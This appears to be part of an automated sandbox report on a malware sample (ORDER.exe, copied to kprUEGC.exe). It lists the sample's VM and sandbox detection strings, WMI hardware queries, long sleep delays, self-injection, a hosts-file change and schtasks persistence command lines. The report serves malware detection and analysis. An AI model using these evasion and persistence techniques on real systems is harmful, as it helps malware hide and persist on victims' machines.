                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AntiVM_3Show sources
                  Source: Yara matchFile source: 0000000D.00000002.333784884.00000000029B1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.254397053.0000000003061000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.359485793.00000000029D1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6928, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ORDER.exe PID: 4356, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6572, type: MEMORY
                  Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\Desktop\ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                  Source: C:\Users\user\Desktop\ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                  Source: ORDER.exe, 00000000.00000002.254519534.00000000030F6000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.334132126.0000000002A46000.00000004.00000001.sdmp, kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                  Source: ORDER.exe, 00000000.00000002.254519534.00000000030F6000.00000004.00000001.sdmp, kprUEGC.exe, 0000000D.00000002.334132126.0000000002A46000.00000004.00000001.sdmp, kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06361B08 rdtsc
                  Source: C:\Users\user\Desktop\ORDER.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\ORDER.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\ORDER.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\ORDER.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\ORDER.exeWindow / User API: threadDelayed 408
                  Source: C:\Users\user\Desktop\ORDER.exeWindow / User API: threadDelayed 4328
                  Source: C:\Users\user\Desktop\ORDER.exeWindow / User API: threadDelayed 963
                  Source: C:\Users\user\Desktop\ORDER.exeWindow / User API: threadDelayed 8895
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 734
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 4181
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 820
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 4880
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 1744
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 1524
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 2135
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWindow / User API: threadDelayed 7709
                  Source: C:\Users\user\Desktop\ORDER.exe TID: 5496Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Users\user\Desktop\ORDER.exe TID: 4756Thread sleep time: -41500s >= -30000s
                  Source: C:\Users\user\Desktop\ORDER.exe TID: 4596Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\ORDER.exe TID: 3336Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\ORDER.exe TID: 3900Thread sleep time: -12912720851596678s >= -30000s
                  Source: C:\Users\user\Desktop\ORDER.exe TID: 3752Thread sleep count: 963 > 30
                  Source: C:\Users\user\Desktop\ORDER.exe TID: 3752Thread sleep count: 8895 > 30
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6608Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6576Thread sleep time: -41500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6596Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 5564Thread sleep time: -11068046444225724s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 4632Thread sleep count: 820 > 30
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 4632Thread sleep count: 4880 > 30
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 7028Thread sleep time: -10145709240540247s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6932Thread sleep time: -41500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6976Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6416Thread sleep time: -24903104499507879s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6412Thread sleep count: 2135 > 30
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe TID: 6412Thread sleep count: 7709 > 30
                  Source: C:\Users\user\Desktop\ORDER.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\ORDER.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: VMware
                  Source: kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: VMWARE
                  Source: kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: VMware
                  Source: kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  Source: kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                  Source: ORDER.exe, 00000000.00000002.253957697.000000000142A000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                  Source: kprUEGC.exe, 00000012.00000002.359710525.0000000002A66000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
                  Source: C:\Users\user\Desktop\ORDER.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_06361B08 rdtsc
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_0636CE1E LdrInitializeThunk,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,
                  Source: C:\Users\user\Desktop\ORDER.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\ORDER.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\ORDER.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\ORDER.exeMemory written: C:\Users\user\Desktop\ORDER.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeMemory written: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe base: 400000 value starts with: 4D5A
                  Modifies the hosts fileShow sources
                  Source: C:\Users\user\Desktop\ORDER.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\ORDER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8EFE.tmp'
                  Source: C:\Users\user\Desktop\ORDER.exeProcess created: C:\Users\user\Desktop\ORDER.exe {path}
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmpE76F.tmp'
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yqoevzHDNPFH' /XML 'C:\Users\user\AppData\Local\Temp\tmp103F.tmp'
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeProcess created: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe {path}
                  Source: ORDER.exe, 00000003.00000002.505906944.0000000001A90000.00000002.00000001.sdmp, kprUEGC.exe, 00000016.00000002.505931875.0000000001840000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: ORDER.exe, 00000003.00000002.505906944.0000000001A90000.00000002.00000001.sdmp, kprUEGC.exe, 00000016.00000002.505931875.0000000001840000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: ORDER.exe, 00000003.00000002.505906944.0000000001A90000.00000002.00000001.sdmp, kprUEGC.exe, 00000016.00000002.505931875.0000000001840000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
                  Source: ORDER.exe, 00000003.00000002.505906944.0000000001A90000.00000002.00000001.sdmp, kprUEGC.exe, 00000016.00000002.505931875.0000000001840000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
                  Source: ORDER.exe, 00000003.00000002.505906944.0000000001A90000.00000002.00000001.sdmp, kprUEGC.exe, 00000016.00000002.505931875.0000000001840000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Users\user\Desktop\ORDER.exe VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
